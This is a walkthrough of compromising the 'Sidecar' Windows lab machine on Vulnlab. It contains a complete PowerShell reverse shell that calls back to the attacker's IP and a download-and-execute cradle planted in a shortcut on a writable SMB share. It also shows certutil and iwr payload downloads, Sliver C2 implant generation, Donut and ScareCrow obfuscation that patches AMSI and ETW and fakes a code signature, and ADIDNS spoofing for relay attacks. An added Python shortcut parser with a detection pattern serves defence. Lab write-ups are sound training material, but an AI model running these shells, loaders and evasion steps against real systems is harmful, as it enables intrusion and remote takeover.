vulnlab-sidecar
A very hard Windows machine
Preparing the Shellcode
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read;
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}
    }
    if ($pos -gt 0) {
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read());
                if ($out -eq $string) {$out = ''}
            }
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null
        }
    } else {cleanup}
}
Create a malicious link on a Windows pc
I used:
powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))
Uploading the malicious link file
└─$ smbclient //DC01.sidecar.vl/Public
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

		6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

		6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

		6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

		6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>
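The shortcut files in that share are writable, and the one uploaded above launches cmd.exe with the PowerShell one-liner from the previous step. As an added defender-side example (not the author's tooling), this Python parses the StringData of a .lnk so shortcuts on a share can be triaged for what they actually run; the SUSPICIOUS pattern list, cp1252 as the ANSI code page, and build_lnk (which constructs the sample input) are assumptions of the example.

```python
"""Triage of Windows shortcut (.lnk) files found on a writable share.

Walks the MS-SHLLINK layout: the 76-byte ShellLinkHeader, the optional
LinkTargetIDList and LinkInfo blocks (skipped via their own size fields),
then the StringData fields that say what the shortcut really launches.
build_lnk() exists only to construct test input inline.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80

# Launcher patterns nobody expects in a shortcut dropped in a "Common" share.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|cmd(\.exe)?\s+/c|\biex\b|invoke-expression|downloaddata"
    r"|downloadstring|\biwr\b|invoke-webrequest|certutil|mshta|rundll32",
    re.IGNORECASE,
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link as a dict."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:                     # IDListSize, then the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:
        # CountCharacters (2 bytes) then the characters, no terminator.
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData")
        pos += 2 + count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if flags & bit:
            fields[name] = read_string()
    return fields


def is_suspicious(fields: dict) -> bool:
    """True when the target path or arguments look like a download cradle."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    return SUSPICIOUS.search(text) is not None


def build_lnk(relative_path: str, arguments: str, unicode: bool = True) -> bytes:
    """Construct a minimal .lnk for testing (dummy IDList and LinkInfo)."""
    flags = HAS_ID_LIST | HAS_LINK_INFO | HAS_REL_PATH | HAS_ARGS
    flags |= IS_UNICODE if unicode else 0
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (76 - len(header))      # attributes, times, icon, ...
    id_list = b"\x04\x00\xaa\xbb" + b"\x00\x00"  # one ItemID, then TerminalID
    id_list = struct.pack("<H", len(id_list)) + id_list
    link_info = struct.pack("<I", 28) + b"\x00" * 24   # opaque 28-byte block
    enc = "utf-16-le" if unicode else "cp1252"
    strings = b"".join(struct.pack("<H", len(s)) + s.encode(enc)
                       for s in (relative_path, arguments))
    return header + id_list + link_info + strings
```

Run parse_lnk over every .lnk found on the share and alert on is_suspicious; the Common.lnk, Install.lnk and Transfer.lnk listed above should only ever point at folders.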
Serving the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -
Getting the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount
Deployer                 Gast
The command completed successfully.

c:\Users\e.klaymore\Desktop>
So we have:
c:\Users\e.klaymore\Desktop>net user

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount
Deployer                 Gast
The command completed successfully.

c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.

User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore
Guest                    J.Chaffrey               krbtgt
M.smith                  O.osvald                 P.robinson
svc_deploy
The command completed successfully.
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free
Start Sliver C2
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck:

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >
Let's donut this file:
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html
Then ScareCrow the file:
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com

  _________                           _________
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \___|  | \(  <_> )     /
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/
        \/     \/     \/             \/        \/
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle.
        Fear is a TEACHER. the first one you ever had.”

[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum  Loader  main.json  README.md  ScareCrow.go  Struct  go.mod  limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots  Utils

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$
I got a session, but after uploading SharpHound.exe my sliver session gets disconnected:
sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL:
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024

sliver (EVIL_USUAL) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore

sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024

sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024

[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST
[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"
So we need the beacon.exe in a new .lnk file:
C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe
I created a working beacon and transferred it to the box with
certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe
and ran c:\programdata\power.exe on the box.
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile
==== ======= ========== ====== ===============
 1    https   tcp        8443

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...
[*] Successfully started job #2
[!] Job #2 stopped (tcp/https)
[!] Job #2 stopped (tcp/https)

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile
==== ======= ========== ====== ===============
 1    https   tcp        8443

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile
==== ======= ========== ====== ===============
 1    https   tcp        8443

[*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST

sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d

[*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Tasked beacon sitecar-3 (952ffb7c)

[+] sitecar-3 completed task 952ffb7c

sliver (sitecar-3) >
sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon sitecar-3 (15da41ae)

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (a86427ba)

[+] sitecar-3 completed task a86427ba

c:\ProgramData\temp (0 items, 0 B)
==================================

[+] sitecar-3 completed task 15da41ae

[*] sharp-hound-4 output:
2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024
2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl
2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings.
 297 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing!
[*] Output saved to /tmp/sharp-hound-4_.2445145387.log

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (0b9f5da2)

[+] sitecar-3 completed task 0b9f5da2

c:\ProgramData\temp (2 items, 83.9 KiB)
=======================================
-rw-rw-rw-  20241023085045_BloodHound.zip                          31.2 KiB  Wed Oct 23 08:50:48 +0200 2024
-rw-rw-rw-  Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin  52.7 KiB  Wed Oct 23 08:50:48 +0200 2024

sliver (sitecar-3) > download 20241023085045_BloodHound.zip

[*] Tasked beacon sitecar-3 (44459e36)

[+] sitecar-3 completed task 44459e36

[*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip

sliver (sitecar-3) >
To be continued …
First we need to promote our beacon to a session to be able to run execute-shellcode.
Warning: if we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies.
Like this:
sliver > sessions

[*] No sessions 🙁

[*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST

sliver > use e5de6c1f-8a91-454b-9154-8006649aa751

[*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751)

sliver (sitecar-3) > interactive

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon sitecar-3 (85062590)

[*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST

sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE]

sliver (sitecar-3) > ^C
input Ctrl-c once more to exit
sliver (sitecar-3) > ^C
interrupted
And then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin:
sliver (sitecar-3) > ^C
interrupted

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

███████╗██╗     ██╗██╗   ██╗███████╗██████╗
██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
███████╗██║     ██║██║   ██║█████╗  ██████╔╝
╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain fear
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

sliver > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE]

sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin

[*] Started remote shell with pid 2108

PS > dir

    Directory: C:\temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/25/2024   8:53 AM       24830704 power.exe

PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A
[+] ADIDNS node puck.sidecar.vl added
PS >
sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"
snip...
2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings.
 59 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing!
[*] Tasked beacon sitecar-3 (e2afe45b)

[+] sitecar-3 completed task e2afe45b
…
We can see that we can't create new machine accounts (ms-ds-machineaccountquota = 0):
sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (189947d6)

sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (c7f43d96)

sliver (sitecar-3) > tasks

 ID         State       Message Type            Created                          Sent                             Completed
========== =========== ======================= ================================ ================================ ================================
 c7f43d96   sent        InvokeExecuteAssembly   Fri, 25 Oct 2024 15:39:01 CEST   Fri, 25 Oct 2024 15:39:07 CEST
 74051079   sent        RegisterExtension       Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST
 189947d6   sent        CallExtension           Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST
 a730ea0b   completed   Download                Fri, 25 Oct 2024 15:18:49 CEST   Fri, 25 Oct 2024 15:18:56 CEST   Fri, 25 Oct 2024 15:18:56 CEST
 db7bfb31   completed   Pwd                     Fri, 25 Oct 2024 15:18:19 CEST   Fri, 25 Oct 2024 15:18:22 CEST   Fri, 25 Oct 2024 15:18:22 CEST

[+] sitecar-3 completed task c7f43d96

[*] Output:
[?] Using DC : DC01.Sidecar.vl
[?] Object   : DC=Sidecar
    Path     : LDAP://DC=Sidecar,DC=vl

[?] Iterating object properties

[+] ridmanagerreference
    |_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl
[+] objectcategory
    |_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl
[+] msds-nctype
    |_ 0
[+] systemflags
    |_ -1946157056
[+] minpwdage
    |_ -864000000000
[+] dscorepropagationdata
    |_ 1/1/1601 12:00:00 AM
[+] uascompat
    |_ 0
[+] usnchanged
    |_ 110627
[+] instancetype
    |_ 5
[+] creationtime
    |_ 133743100080295319
[+] pwdhistorylength
    |_ 24
[+] ms-ds-machineaccountquota
    |_ 0
[+] subrefs
    |_ DC=ForestDnsZones,DC=Sidecar,DC=vl
    |_ DC=DomainDnsZones,DC=Sidecar,DC=vl
    |_ CN=Configuration,DC=Sidecar,DC=vl
[+] lockoutduration
    |_ -18000000000
[+] name
    |_ Sidecar
This means we can't perform an RBCD attack (https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users), as we would need another computer or service account that we control.
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 1652

PS > pwd

Path
----
C:\Windows\Tasks
# on sliver [server]
sliver (sitecar-3) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081

# on local machine
proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''
WebDAV
We first need the authentication request or hash from our machine account. As we can't relay SMB to SMB (or LDAP), we need to change our source to HTTP.
For this we need to enable Webdav (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient)
We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/
From a session (not a beacon) run:
sliver (sitecar-3) > upload GetWebDAVStatus.exe

[*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe

sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1"

[*] Output:
[+] WebClient service is active on 127.0.0.1

sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub"

[*] Command executed successfully

sliver (sitecar-3) >
DNS
WebDAV only works if we use a DNS name for our target, so we first need to add a new DNS entry to the AD: https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing
For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad), even in a newly spawned interactive shell.
I used this sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file, which also contains Powermad.
Warning: if we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies.
So we run execute-shellcode -i /payloads/UnmanagedPowerShell.bin, and then we add a DNS entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 3364

PS > pwd

Path
----
C:\Windows\Tasks

PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
